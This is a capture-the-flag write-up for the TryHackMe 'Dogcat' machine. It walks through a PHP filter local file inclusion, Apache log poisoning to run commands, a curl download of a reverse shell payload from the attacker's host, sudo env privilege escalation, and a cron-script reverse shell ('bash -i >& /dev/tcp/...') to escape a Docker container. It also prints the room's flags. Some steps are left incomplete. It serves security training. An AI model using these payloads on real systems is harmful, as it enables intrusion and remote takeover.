d3vyce
095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
195 lines
5.6 KiB
Markdown
195 lines
5.6 KiB
Markdown
---
|
|
title: "Writeup - Dogcat (THM)"
|
|
date: 2022-05-31
|
|
slug: "writeup-dogcat-thm"
|
|
type: "writeup-ctf"
|
|
---
|
|
|
|
This is a writeup for the [Dogcat](https://tryhackme.com/room/dogcat) machine from the TryHackMe site.
|
|
|
|
## Enumeration
|
|
|
|
First, let's start with a scan of our target with the following command:
|
|
|
|
|
|
```bash
|
|
nmap -sV -T4 -Pn 10.10.11.146
|
|
```
|
|
Two TCP ports are discovered:
|
|
|
|
|
|
|
|
- 22/tcp : SSH port (OpenSSH 7.6p1)
|
|
- 80/tcp : HTTP web server (Apache 2.4.38)
|
|
|
|
|
|
|
|
## Exploit
|
|
|
|
In a first step I start by making a scan of the website folders:
|
|
|
|
|
|
|
|
We find a page `cat.php`, it is surely the page which provides the random images of cat. With a little deduction I find a similar page: `dog.php`.
|
|
|
|
I notice the use of an argument when I click on one of the buttons. So I try a Local-Remote File Inclusion, but without success. An error tells us that the options are: `dog` & `cat`.
|
|
|
|
After some research I find the following page: [PHP Base64 Filter](https://blog.clever-age.com/fr/2014/10/21/owasp-local-remote-file-inclusion-lfi-rfi/). These are techniques to bypass security checks for Local-Remote File Inclusion. I try the version using a PHP filter:
|
|
|
|
|
|
```bash
|
|
http://10.10.91.89/?view=php://filter/read=convert.base64-encode/resource=cat/../index
|
|
```
|
|
I get the contents of the index file encoded in base64 :
|
|
|
|
|
|
```bash
|
|
<!DOCTYPE HTML>
|
|
<html>
|
|
|
|
<head>
|
|
<title>dogcat</title>
|
|
<link rel="stylesheet" type="text/css" href="/style.css">
|
|
</head>
|
|
|
|
<body>
|
|
<h1>dogcat</h1>
|
|
<i>a gallery of various dogs or cats</i>
|
|
|
|
<div>
|
|
<h2>What would you like to see?</h2>
|
|
<a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
|
|
<?php
|
|
function containsStr($str, $substr) {
|
|
return strpos($str, $substr) !== false;
|
|
}
|
|
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
|
|
if(isset($_GET['view'])) {
|
|
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
|
|
echo 'Here you go!';
|
|
include $_GET['view'] . $ext;
|
|
} else {
|
|
echo 'Sorry, only dogs or cats are allowed.';
|
|
}
|
|
}
|
|
?>
|
|
</div>
|
|
</body>
|
|
|
|
</html>
|
|
```
|
|
I can also use the same principle to get the content of the `flag.php` flag.
|
|
|
|
|
|
```bash
|
|
┌──(d3vyce㉿kali)-[~/Documents]
|
|
└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d
|
|
<?php
|
|
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"
|
|
?>
|
|
```
|
|
Pour faire une injection de commande //TODO
|
|
|
|
|
|
|
|
|
|
```bash
|
|
[11/May/2022:12:26:50 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=cat/../../../../etc/passwd&ext&test=id HTTP/1.1" 400 0 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data) "
|
|
```
|
|
|
|
```bash
|
|
http://10.10.91.89/?view=php://filter/resource=cat/../../../../../var/log/apache2/access.log&ext&test=curl%2010.8.3.186:80/reverse.php%20%3E%20reverse.php
|
|
```
|
|
|
|
|
|
I now have a reverse shell as `www-data`.
|
|
|
|
|
|
```bash
|
|
$ cd /var/www
|
|
$ ls
|
|
flag2_QMW7JvaY2LvK.txt
|
|
html
|
|
$ cat flag2_QMW7JvaY2LvK.txt
|
|
THM{LF1_t0_RC3_aec3fb}
|
|
```
|
|
I can get the second flag.
|
|
|
|
## Privilege escalation
|
|
|
|
I start by checking the sudo permissions of my user :
|
|
|
|
|
|
|
|
I have the permission to run the `env` command as `root`. So I look on GTFObin to see if there is a possibility to launch a shell with this command: [env sudo](https://gtfobins.github.io/gtfobins/env/#sudo).
|
|
|
|
With the following command I create a `root` shell.
|
|
|
|
|
|
|
|
|
|
```bash
|
|
cd /root
|
|
ls
|
|
flag3.txt
|
|
cat flag3.txt
|
|
THM{D1ff3r3nt_3nv1ronments_874112}
|
|
```
|
|
I can get the third flag. After some research I notice a `dockerenv` file. So we are in a docker and I will have to find a way to get out to get the last flag.
|
|
|
|
|
|
```bash
|
|
ls -la
|
|
total 80
|
|
drwxr-xr-x 1 root root 4096 May 11 11:59 .
|
|
drwxr-xr-x 1 root root 4096 May 11 11:59 ..
|
|
-rwxr-xr-x 1 root root 0 May 11 11:59 .dockerenv
|
|
drwxr-xr-x 1 root root 4096 Feb 26 2020 bin
|
|
drwxr-xr-x 2 root root 4096 Feb 1 2020 boot
|
|
drwxr-xr-x 5 root root 340 May 11 11:59 dev
|
|
drwxr-xr-x 1 root root 4096 May 11 11:59 etc
|
|
drwxr-xr-x 2 root root 4096 Feb 1 2020 home
|
|
drwxr-xr-x 1 root root 4096 Feb 26 2020 lib
|
|
drwxr-xr-x 2 root root 4096 Feb 24 2020 lib64
|
|
drwxr-xr-x 2 root root 4096 Feb 24 2020 media
|
|
drwxr-xr-x 2 root root 4096 Feb 24 2020 mnt
|
|
drwxr-xr-x 1 root root 4096 May 11 11:59 opt
|
|
dr-xr-xr-x 112 root root 0 May 11 11:59 proc
|
|
drwx------ 1 root root 4096 Mar 10 2020 root
|
|
drwxr-xr-x 1 root root 4096 Feb 26 2020 run
|
|
drwxr-xr-x 1 root root 4096 Feb 26 2020 sbin
|
|
drwxr-xr-x 2 root root 4096 Feb 24 2020 srv
|
|
dr-xr-xr-x 13 root root 0 May 11 11:59 sys
|
|
drwxrwxrwt 1 root root 4096 Mar 10 2020 tmp
|
|
drwxr-xr-x 1 root root 4096 Feb 24 2020 usr
|
|
drwxr-xr-x 1 root root 4096 Feb 26 2020 var
|
|
ls /otp
|
|
ls: cannot access '/otp': No such file or directory
|
|
ls /opt
|
|
backups
|
|
```
|
|
In the `/opt` folder I find a `backups` file with the following content:
|
|
|
|
|
|
```bash
|
|
#!/bin/bash
|
|
tar cf /root/container/backup/backup.tar /root/container
|
|
```
|
|
backup.shIt is most certainly a script that runs regularly with a CRON job. Knowing that I can write to the file, I add the following line:
|
|
|
|
|
|
```bash
|
|
echo "bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> backup.sh
|
|
```
|
|
After a few seconds, I have a reverse shell as root but on the machine and not in a docker.
|
|
|
|
|
|
|
|
I can now recover the last flag.
|
|
|
|
|
|
```bash
|
|
# cat /root/flag4.txt
|
|
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
|
|
```
|